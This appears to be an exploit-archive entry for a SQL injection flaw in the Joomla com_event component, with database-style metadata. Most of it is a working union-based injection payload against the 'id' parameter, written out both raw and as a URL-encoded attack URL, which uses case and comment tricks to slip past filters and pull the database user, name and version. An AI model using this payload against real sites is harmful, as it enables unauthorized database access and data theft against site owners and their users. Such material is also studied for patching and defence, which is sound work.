[] NeoSense

Joomla! Component com_event - SQL Injection

Author: anonymous
type: webapps
platform: php
port: 
date_added: 2010-05-16 
date_updated: 2017-01-09 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: 

# Exploit Title: Joomla Component com_event another sql injection vuln
# Date: 17/5/2010
# Author: N/A
# Software Link: www.joomla.org/download.html
# Version: Multible versions

# Code :
The Attacker Can Exploit A SQL injection vuln in the following:


The Sql injection query:

index.php?option=com_event&task=view&id=-14 UnioN/**/SelECt 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4--

Example:

http://[site]/index.php?option=com_event&task=view&id=-14%20UnioN/**/SelECt%201,2,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,4--

Thanks To All Muslims

h8k@hotmail.it